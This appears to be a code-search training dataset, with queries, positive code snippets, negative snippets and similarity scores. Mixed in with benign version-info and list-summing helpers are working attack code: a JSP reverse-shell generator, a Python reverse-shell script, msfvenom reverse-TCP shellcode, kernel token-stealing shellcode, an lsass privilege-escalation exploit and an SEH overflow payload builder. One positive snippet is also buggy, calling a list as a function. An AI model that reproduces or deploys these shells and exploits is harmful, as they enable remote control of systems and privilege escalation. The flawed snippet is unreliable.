"def info():\n\n print('Maptool\\n--------\\n')\n print('Version: ' + __version__)\n print('Path: ' + __path__[0])\n print('Date: ' + __date__)\n print()\n\n import sys\n print('Python version=' + sys.version + '\\n')\n\n try:\n mm = __import__('pymongo')\n print('%10s %10s %s' % ('pymongo', mm.version, mm.__path__[0]))\n except ImportError:\n print('pymongo Not Found')\n\n for modui in ['numpy', 'scipy', 'mayavi', 'matplotlib', 'tqdm',\n 'future', 'nose', 'coverage', 'spglib', 'pyhull', 'pymatgen', 'qmpy', ]:\n try:\n mm = __import__(modui)\n print('%10s %10s %s' % (modui, mm.__version__, mm.__path__[0]))\n except ImportError:\n print('%10s %10s Not Found' % (modui, ''))\n\n if ASE:\n import ase\n #from ase import version as ase_version\n print('%10s %10s %s' % ('ase', ase.__version__, ase.__path__[0]))\n else:\n print('%10s %10s Not Found' % ('ase', ''))",
"def algorithmInfo():\n\t\treturn r\"\"\"TODO\"\"\"",
"def version():\n\n pass",
"def get_version():\n return 1",
"def info():\n return buildcat.info()",
"def pyzmq_version_info():\n return version_info",
"def system_info() -> str:\n return \"\\n\".join(\n [\n f\"Python version: {platform.python_version()}\",\n f\"Python implementation: {platform.python_implementation()}\",\n f\"Python compiler: {platform.python_compiler()}\",\n f\"PyTorch version: {torch.__version__}\",\n f\"System: {platform.system() or 'Unable to determine'}\",\n f\"System version: {platform.release() or 'Unable to determine'}\",\n f\"Processor: {platform.processor() or 'Unable to determine'}\",\n f\"Number of CPUs: {multiprocessing.cpu_count()}\",\n ]\n )",
"def get_info():\n\n #Determine if running on Linux or Mac.\n if platform.system() == 'Linux':\n linux = True\n\n elif platform.system() == \"Darwin\":\n linux = False\n\n if linux:\n from . import linux\n linux.get_info()\n diskinfo = linux.DISKINFO\n\n else:\n from . import macos\n macos.get_info()\n diskinfo = macos.DISKINFO\n\n return diskinfo",
"def print_info(args):\n print(banner_small)\n display_config_info()\n\n print(\"\")\n print(\"Python Configuration\")\n print(\"-\" * 25)\n print(\"\")\n info_calls = [\"which python3\", \"python3 --version\", \"which pip3\", \"pip3 --version\"]\n info_str = \"\"\n for x in info_calls:\n info_str += 'echo \" $ ' + x + '\" && ' + x + \"\\n\"\n info_str += \"echo \\n\"\n info_str += r\"echo \\\"echo \\$PYTHONPATH\\\" && echo $PYTHONPATH\"\n _ = subprocess.run(info_str, shell=True)\n print(\"\")",
"def get_python_version():\r\n return \"py%i.%i\" % (sys.version_info[0], sys.version_info[1])",
"def sys_info(fname=None, overwrite=False):\n if fname is not None and op.isfile(fname) and not overwrite:\n raise IOError('file exists, use overwrite=True to overwrite')\n\n out = ''\n try:\n # Nest all imports here to avoid any circular imports\n from ..app import use_app, Canvas\n from ..app.backends import BACKEND_NAMES\n from ..gloo import gl\n from ..testing import has_backend\n # get default app\n with use_log_level('warning'):\n app = use_app(call_reuse=False) # suppress messages\n out += 'Platform: %s\\n' % platform.platform()\n out += 'Python: %s\\n' % str(sys.version).replace('\\n', ' ')\n out += 'Backend: %s\\n' % app.backend_name\n for backend in BACKEND_NAMES:\n if backend.startswith('ipynb_'):\n continue\n with use_log_level('warning', print_msg=False):\n which = has_backend(backend, out=['which'])[1]\n out += '{0:<9} {1}\\n'.format(backend + ':', which)\n out += '\\n'\n # We need an OpenGL context to get GL info\n canvas = Canvas('Test', (10, 10), show=False, app=app)\n canvas._backend._vispy_set_current()\n out += 'GL version: %r\\n' % (gl.glGetParameter(gl.GL_VERSION),)\n x_ = gl.GL_MAX_TEXTURE_SIZE\n out += 'MAX_TEXTURE_SIZE: %r\\n' % (gl.glGetParameter(x_),)\n out += 'Extensions: %r\\n' % (gl.glGetParameter(gl.GL_EXTENSIONS),)\n canvas.close()\n except Exception: # don't stop printing info\n out += '\\nInfo-gathering error:\\n%s' % traceback.format_exc()\n pass\n if fname is not None:\n with open(fname, 'w') as fid:\n fid.write(out)\n return out",
"def get_short_code_stats():\n return rh.get_short_code_stats(request)",
"def python_implementation():\n return _sys_version()[0]",
"def python_version():\n return _sys_version()[1]",
"def _proc_info(self):\n ret = cext.proc_info(self.pid)\n assert len(ret) == len(pinfo_map)\n return ret"
] |
[
"0.6446138",
"0.63850063",
"0.59758496",
"0.57701653",
"0.5352841",
"0.53243315",
"0.5187391",
"0.5157908",
"0.51493025",
"0.5139393",
"0.50845015",
"0.5054053",
"0.50187427",
"0.49383837",
"0.49188626",
"0.4916893",
"0.4897124",
"0.4884904",
"0.48526204",
"0.485079",
"0.4848358",
"0.48148084",
"0.4814405",
"0.4808253",
"0.4806849",
"0.47767437",
"0.47690147",
"0.476859",
"0.47433597",
"0.47390267"
] |
0.692314
|
0
|
Function to get java(jsp) shellcode
|
def get_javacode(self, localhost, localport):
if not localhost or not localport:
print "Settings for connectback listener must be defined"
return False
javacode = ""
javacode += """
<%@ page import="java.lang.*, java.util.*, java.io.*, java.net.*" %>
<%
for (;;) {
Socket socket = new Socket("LOCALHOST", LOCALPORT);
InputStream inSocket = socket.getInputStream();
BufferedReader s_in = new BufferedReader(new InputStreamReader(inSocket));
OutputStream outSocket = socket.getOutputStream();
char buffer[] = new char[8192];
int length = s_in.read( buffer, 0, buffer.length );
String cmd = String.valueOf(buffer,0, length);
Process p = new ProcessBuilder("cmd.exe", "/C", cmd).redirectErrorStream(true).start();
InputStream is = p.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(is));
String in;
String all = "";
while ((in = br.readLine()) != null) {
all = all + in + "\\n\\r";
}
outSocket.write(all.getBytes());
socket.close();
}
%>"""
javacode = javacode.replace("LOCALHOST", str(localhost))
javacode = javacode.replace("LOCALPORT", str(localport))
return javacode
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code",
"def java(self):\r\n return self.binary('java')",
"def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)",
"def run_next_action():\n os.environ[\"BROWSER\"] = 'echo %s'\n result = subprocess.run(context.arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding=\"utf-8\")\n return result.stdout + result.stderr",
"def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode",
"def _get_command_result(java_path: str) -> str:\n return exec_command([java_path, \"-version\"], use_stderr=True)",
"def run_code():\n\n output = None\n code = request.json['code']\n\n cmd = 'python -c \"' + code +'\"'\n p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, close_fds=True)\n output = p.stdout.read()\n\n return jsonify(output.decode('utf-8'))",
"def return_py_script(path):\n old_stdout = sys.stdout\n sys.stdout = mystdout = StringIO()\n exec(open(path).read())\n sys.stdout = old_stdout\n content = mystdout.getvalue()\n if \"<http>\" in content:\n mime_type = b\"text/html\"\n else:\n mime_type = b\"text/plain\"\n content = content.encode()\n return content, mime_type",
"def get_python_code(self, badchars, localhost, localport):\n\n if not localhost or not localport:\n print \"Settings for connectback listener must be defined\"\n return False\n\n pythoncode = \"\"\n pythoncode += \"\"\"\n#!/usr/bin/python\nimport socket,subprocess\n\nHOST = 'LOCALHOST' # The remote host\nPORT = LOCALPORT # The same port as used by the server\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect to attacker machine\ns.connect((HOST, PORT))\n\n# send we are connected\ns.send('[*] Connection Established!')\n# start loop\nwhile 1:\n # recieve shell command\n data = s.recv(1024)\n print data\n\n # if its quit, then break out and close socket\n if data == 'quit' or data == 'q':\n break\n\n # do shell command\n proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n # read output\n stdout_value = proc.stdout.read() + proc.stderr.read()\n # send output to attacker\n s.send(stdout_value)\n# close socket\ns.close()\n\"\"\"\n\n pythoncode = pythoncode.replace(\"LOCALHOST\", str(localhost))\n pythoncode = pythoncode.replace(\"LOCALPORT\", str(localport))\n\n return pythoncode",
"def run_python(request):\r\n if not request.user.is_staff:\r\n raise Http404\r\n c = {}\r\n c['code'] = ''\r\n c['results'] = None\r\n if request.method == 'POST':\r\n py_code = c['code'] = request.POST.get('code')\r\n g = {}\r\n try:\r\n safe_exec(py_code, g)\r\n except Exception as e:\r\n c['results'] = traceback.format_exc()\r\n else:\r\n c['results'] = pprint.pformat(g)\r\n return render_to_response(\"debug/run_python_form.html\", c)",
"def _command_template(self, switches):\n\n command = [\"java\", \"-jar\", self.file_jar, \"-eUTF-8\"]\n\n if self.memory_allocation:\n command.append(\"-Xmx{}\".format(self.memory_allocation))\n\n command.extend(switches)\n\n if six.PY2:\n with open(os.devnull, \"w\") as devnull:\n out = subprocess.Popen(\n command, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=devnull)\n elif six.PY3:\n out = subprocess.Popen(\n command, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)\n\n stdoutdata, _ = out.communicate()\n\n return stdoutdata.decode(\"utf-8\").strip()",
"def get_shell(self, shell):",
"def provided_or_last(s=None, shell=None):\n if shell is None:\n shell = get_ipython()\n if shell is None:\n return\n if s is not None:\n code_to_page = shell.find_user_code(s, skip_encoding_cookie=True)\n else:\n # noinspection PyProtectedMember\n code_to_page = shell._i\n\n return code_to_page",
"def get_code(path):\n if path is None:\n return pasteboard.get()\n else:\n with open(path, 'r', encoding='UTF-8') as html_file:\n code = html_file.read()\n return code",
"def get_executable(self) -> str:\n ...",
"def generateShellcode(self, listener: str, staged: bool = False, x64: bool = True) -> bytes:\t\t\n\t\treturn self.generatePayload(listener, ArtifactType.RAW, staged=staged, x64=x64)",
"def version_from_path(cls, tools: ToolCache, java_path: str | Path) -> str:\n output = tools.subprocess.check_output(\n [\n os.fsdecode(Path(java_path) / \"bin\" / \"javac\"),\n \"-version\",\n ],\n )\n # javac's output should look like \"javac 17.0.X\\n\"\n return output.strip(\"\\n\").split(\" \")[1]",
"def get(self):\r\n #python = sys.executable\r\n #os.execl(python, python, * sys.argv)\r\n os.execl(sys.executable, *([sys.executable] + sys.argv))",
"def get_rtmpdump_cmd(pid):\n url = URL_BASE + CONVERT.format(pid)\n root = lxml.html.parse(url)\n codes = root.findall('.//p/code')\n if len(codes) == 1:\n return codes[0].text\n elif len(codes) < 1:\n print 'pid2rtmpdump: <p><code> not found!'\n return False\n else:\n print 'pid2rtmpdump: more than one <p><code> elements found: {0}'.format(len(codes))\n return False",
"def shell(cmd):\n return subprocess.check_output(cmd, shell=True).decode(\"utf-8\")",
"def index(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [str.encode('''Hello World Application\n This is the Hello World application:\n\n`continue <hello/>`_\n\n''')]",
"def _exploit(code):\n shellcode_ptr, shellcode_len = _ret_shellcode_buffer() # shellcode virtual allocation\n\n debug_print(\"\\n[*] User-land shellcode allocated at: [0x%x]\\n\" % shellcode_ptr)\n debug_print(hexdump(shellcode_ptr, 32))\n \"\"\"\n 3: kd> !process 0 0 lsass.exe\n PROCESS [87662d40] SessionId: 1 Cid: 0214 Peb: 7ffd9000 ParentCid: 01ac\n DirBase: be6e20e0 ObjectTable: 9aa8a008 HandleCount: 116.\n Image: lsass.exe\n\n 3: kd> dps 87662d40-4\n 87662d3c 8c005e1f => OVERFLOW HERE WITH [0x00000000] \n 87662d40 00260003 AND GET ALL PERMISSIONS OF [lsass.exe] process W/ WHATAEVER USER\n 87662d44 00000001\n 87662d48 87662d48\n 87662d4c 87662d48\n 87662d50 87662d50\n 87662d54 87662d50\n 87662d58 be6e20e0\n 87662d5c 00000000\n 87662d60 00000000\n\n 3: kd> !object 87662d40 \n Object: 87662d40 Type: (85611d58) Process\n ObjectHeader: [87662d28] (new version) => [dt nt!_OBJECT_HEADER 87662d28]\n HandleCount: 10 PointerCount: 106\n\n 3: kd> dt nt!_OBJECT_HEADER 87662d28 \n +0x000 PointerCount : 0n106\n +0x004 HandleCount : 0n10\n +0x004 NextToFree : 0x0000000a Void\n +0x008 Lock : _EX_PUSH_LOCK\n +0x00c TypeIndex : 0x7 ''\n +0x00d TraceFlags : 0 ''\n +0x00e InfoMask : 0x8 ''\n +0x00f Flags : 0 ''\n +0x010 ObjectCreateInfo : 0x82b44cc0 _OBJECT_CREATE_INFORMATION\n +0x010 QuotaBlockCharged : 0x82b44cc0 Void\n +0x014 SecurityDescriptor : 0x8c005e1d Void \n +0x018 Body : _QUAD\n\n 3: kd> !sd (0x8c005e1f - 0x7) => [SecurityDescription from lsass.exe process]\n ->Revision: 0x1\n ->Sbz1 : 0x0\n ->Control : 0x8814\n SE_DACL_PRESENT\n SE_SACL_PRESENT\n SE_SACL_AUTO_INHERITED\n SE_SELF_RELATIVE\n ->Owner : S-1-5-32-544\n ->Group : S-1-5-18\n ->Dacl : \n ->Dacl : ->AclRevision: 0x2\n ->Dacl : ->Sbz1 : 0x0\n ->Dacl : ->AclSize : 0x3c\n ->Dacl : ->AceCount : 0x2\n ->Dacl : ->Sbz2 : 0x0\n ->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[0]: ->AceFlags: 0x0\n ->Dacl : ->Ace[0]: ->AceSize: 0x14\n ->Dacl : ->Ace[0]: ->Mask : 0x001fffff\n ->Dacl : ->Ace[0]: ->SID: S-1-5-18\n\n ->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE\n ->Dacl : ->Ace[1]: ->AceFlags: 0x0\n ->Dacl : ->Ace[1]: ->AceSize: 0x18\n ->Dacl : ->Ace[1]: ->Mask : 0x00121411\n ->Dacl : ->Ace[1]: ->SID: S-1-5-32-544\n\n ->Sacl : \n ->Sacl : ->AclRevision: 0x2\n ->Sacl : ->Sbz1 : 0x0\n ->Sacl : ->AclSize : 0x1c\n ->Sacl : ->AceCount : 0x1\n ->Sacl : ->Sbz2 : 0x0\n ->Sacl : ->Ace[0]: ->AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE\n ->Sacl : ->Ace[0]: ->AceFlags: 0x0\n ->Sacl : ->Ace[0]: ->AceSize: 0x14\n ->Sacl : ->Ace[0]: ->Mask : 0x00000003\n ->Sacl : ->Ace[0]: ->SID: S-1-16-16384\n \"\"\"\n \n lsass_pid = getPidByName(\"lsass.exe\")\n debug_print(\"\\n[!] lsass.exe PID: 0x%x\\n\" % lsass_pid)\n \n leaked_objects = get_handles(lsass_pid) # return lsass.exe handles (nt!_EPROCESS)\n \n #if leaked_objects:\n #debug_print(\"\\n[+] lsass.exe nt!_EPROCESS address leaked!!: [0x%x]\" % leaked_objects)\n \n for leak_obj in leaked_objects:\n\n SecurityDescription = leak_obj - 4 # nullify SecurityDescription located at [_EPROCESS - 4]\n debug_print(\"\\t\\t[*] Address of SecurityDescription to be nullify: [0x%x]\" % SecurityDescription)\n \n payload = struct.pack(\"<L\", SecurityDescription)\n payload_ptr = id(payload) + 0x14\n payload_len = len(payload)\n \n # send custom payload\n _send_payload(\n payload_ptr,\n payload_len,\n code\n )\n\n debug_print(\"[+] Exploit Payload Sent!\")\n debug_print(\"[!] Getting nt-authority/SYSTEM impersonated process shell...\")\n \n winlogon_pid = getPidByName(\"winlogon.exe\")\n return inject_shellcode(winlogon_pid) # get SYSTEM shell",
"def code():",
"def pythoncurl():\n return render_template(\n 'pythoncurl.html',\n nav=nav,\n title='Python Curl',\n year=datetime.now().year,\n message='Your application description page.',\n output=output\n )",
"def getCompilerOutput(uname):\n fname = os.path.join(webapp.config['UPLOADED_BUILD_DEST'], uname, 'output').encode('utf8')\n if os.path.exists(fname):\n stdout_file = open(fname, 'r')\n output = unicode(stdout_file.read(), 'utf-8')\n stdout_file.close()\n return output\n else:\n return returnError(\"Output not available for \" + uname, 404)",
"def get_code():\n return inspect.getsource(sieve_of_eratosthenes)",
"def build_buf(shellcode: bytes = b\"\") -> bytes:\n # bad_chars: \\x00\\x20\\x25\\x2b\\x2f\\x5c\n # *************\n # Buffer Layout\n # *************\n #\n # Overwrite w/ 4061 bytes\n # SEH overwrite 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll]\n # net jump over seh\n # shellcode\n # pad to 500 bytes\n\n payload = b\"A\" * 4061\n payload += struct.pack(\"<L\", 0x04750674) #nseh\n payload += struct.pack(\"<L\", 0x1002324c) #seh\n payload += shellcode\n payload += b\"\\xcc\" * (5000 - len(payload))\n\n buf = b\"GET \"\n buf += payload\n buf += b\" HTTP/1.1\\r\\n\"\n return buf",
"def __getJumboCmd(self):\n return self.__getCmd(\"JUMBO_HOME\", \"jumbo-converters.jar\", \"JUMBO\")",
"def do_sh(self, none):\n print(\"**** Not Implemented\")",
"def compile_java(self):\n if(self.input == \"\"):\n stderr = subprocess.run(\n [\"javac\", self.id+\".java\"], stderr=subprocess.PIPE).stderr.decode('utf-8')\n if(len(stderr) == 0):\n self.status = 1\n stdout = subprocess.run(\n [\"java\"+self.id], stdout=subprocess.PIPE).stdout.decode('utf-8')\n self.output = stdout\n else:\n self.status = 0\n self.output = stderr\n else:\n pass"
] |
[
"0.65716577",
"0.62779516",
"0.5901102",
"0.5884757",
"0.58177274",
"0.5609137",
"0.5590681",
"0.5558408",
"0.5501154",
"0.5491614",
"0.5461308",
"0.5412035",
"0.53937984",
"0.5315008",
"0.53004134",
"0.52274543",
"0.5221554",
"0.52188283",
"0.5174355",
"0.5173966",
"0.5151633",
"0.5137555",
"0.5124395",
"0.5122991",
"0.511768",
"0.5114628",
"0.50789994",
"0.50689596",
"0.50574845",
"0.50549644"
] |
0.63459843
|
1
|
loopbased function that sums the odd elements in list L
|
def summedOdds(L):
result = 0
element = 0
for e in L:
if element%2 != 0:
result = result + L(element)
element = element + 1
return result
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def summedOdds(L):\r\n result = 0\r\n for e in L:\r\n if e % 2 == 1:\r\n result = result + e # or result += e\r\n return result",
"def summedOdds( L ):\n result = 0\n for element in L:\n if element %2 ==1: #checking if the current elemnt is odd\n result = result + element # if it is odd, add it to the result, or result += e\n return result",
"def summed(L):\r\n result = 0\r\n for e in L:\r\n result = result + e # or result += e\r\n return result",
"def even_odd_sums(seq):\n even = seq[0::2]\n odd = seq[1::2]\n return [sum(even), sum(odd)]",
"def mono_sum(l):\n r = next(l)\n for m in l: r = r + m\n return r",
"def sum_of_even(numbers):\r\n\r\n\tsum = 0\r\n\tfor i in numbers:\r\n\t\tif (i%2 == 0):\r\n\t\t\tsum += i\r\n\r\n\treturn sum",
"def increment_odds(l):\n odd_increment = []\n for number in l:\n if number % 2 == 1:\n number += 1\n odd_increment.append(number)\n else:\n odd_increment.append(number)\n return odd_increment",
"def sum_of_initial_odds(the_nums):\r\n my_sum = 0\r\n for num in the_nums:\r\n if num % 2 == 0:\r\n # as soon as even number found, we're done\r\n return my_sum\r\n else:\r\n # add odd number to accumulator\r\n my_sum += num\r\n # reached end of list (no even numbers in the_nums)\r\n return my_sum",
"def interleaved_sum(n, odd_term, even_term):\n \"*** YOUR CODE HERE ***\"\n if n == 1:\n return 1\n f = odd_term\n if n % 2 == 0:\n f = even_term\n return f(n) + interleaved_sum(n - 1, odd_term, even_term)",
"def lsum (inlist):\r\n s = 0\r\n for item in inlist:\r\n s = s + item\r\n return s",
"def interleaved_sum(n, odd_term, even_term):\n def sum_helper(i, res):\n if i > n:\n return res\n if i % 2 == 0:\n return sum_helper(i+1, res + even_term(i))\n else:\n return sum_helper(i+1, res + odd_term(i))\n return sum_helper(0, 0)",
"def sum(lst):\n total = 0\n for i in lst:\n total += i\n return total",
"def interleaved_sum(n, odd_term, even_term):\n k = 1\n def odd(k):\n if k > n:\n return 0\n else:\n return odd_term(k) + even(k + 1)\n def even(k):\n if k > n:\n return 0\n else:\n return even_term(k) + odd(k + 1)\n return odd(k)",
"def running_sum(nums_li: List[int]) -> List[int]:\n for i in range(1, len(nums_li)):\n nums_li[i] += nums_li[i - 1]\n return nums_li",
"def get_sum(lst):\n _sum=0\n for i in lst:\n _sum+=i\n return _sum",
"def sumDivisor(inputList):\n result = 0\n for i in inputList:\n result += i\n return result",
"def find_sum( *my_list):\n # a = len(my_list)- 2\n # i = 0\n # suma=0\n # for i in my_list :\n # suma += my_list[i]\n # i+=1\n # return suma\n return sum(my_list)",
"def ll_sum(x):\n xlist = []\n for i in x:\n for num in i:\n xlist.append(num)\n return sum(xlist)",
"def sum_list(numbers):\n\t\n\tif len(numbers) == 0:\n\t\treturn 0 \n\n\tsum = numbers[0] +sum_list(numbers[1:])\n\treturn sum",
"def ll_sum(some_list):\n #This function will return total value of all integers combinded.\n result = 0\n if type(some_list) == list: #Check the element is list or not?\n for i in range(len(some_list)):\n result += ll_sum(some_list[i]) # if it's a list call this function \n #so it will call over and over untill it found element that not a list.\n elif type(some_list) == float or type(some_list) == int: #if it's not list return it value.\n result += some_list\n return result",
"def fn(nums):\n if len(nums) == 1: return nums\n return fn(nums[::2]) + fn(nums[1::2])",
"def sum_unique(l):\n pass",
"def list_sum(lst):\n total = 0\n for ele in range(0, len(lst)):\n total = total + lst[ele]\n return total",
"def ssum(L: list) -> int:\n return 0 if not L else L[0]+ssum(L[1:])",
"def sum_list(list_obj):\r\n sum = 0\r\n for num in list_obj:\r\n sum += num\r\n return sum",
"def only_even(mixed_list):",
"def add_up(num):\n aList = list(range(1, num + 1))\n sum = 0\n\n for item in aList:\n sum = add_together(sum, item)\n# print(\"NOW SUM IS: \" + str(sum))\n\n return sum",
"def sum_evens(the_nums):\r\n my_sum = 0\r\n for num in the_nums:\r\n if num % 2 == 0:\r\n my_sum += num\r\n return my_sum",
"def postitionalSum(list1, list2):\r\n\r\n myList = []\r\n\r\n if list1 == []:\r\n return []\r\n else:\r\n myList.append(list1[0]+list2[0])\r\n list1.remove(list1[0]), list2.remove(list2[0])\r\n postitionalSum(list1, list2)\r\n return myList",
"def sumValues(aList):\r\n sum = 0\r\n for d in aList:\r\n sum += d\r\n return sum"
] |
[
"0.8202531",
"0.818297",
"0.72264755",
"0.7155077",
"0.6779432",
"0.6763767",
"0.67523843",
"0.67198855",
"0.67146987",
"0.6634213",
"0.66224146",
"0.6493464",
"0.647851",
"0.6451017",
"0.6442839",
"0.6419634",
"0.6373533",
"0.6341522",
"0.61926824",
"0.61879593",
"0.6172271",
"0.60794777",
"0.6063576",
"0.6054695",
"0.6042873",
"0.60302347",
"0.60266525",
"0.60129243",
"0.60128284",
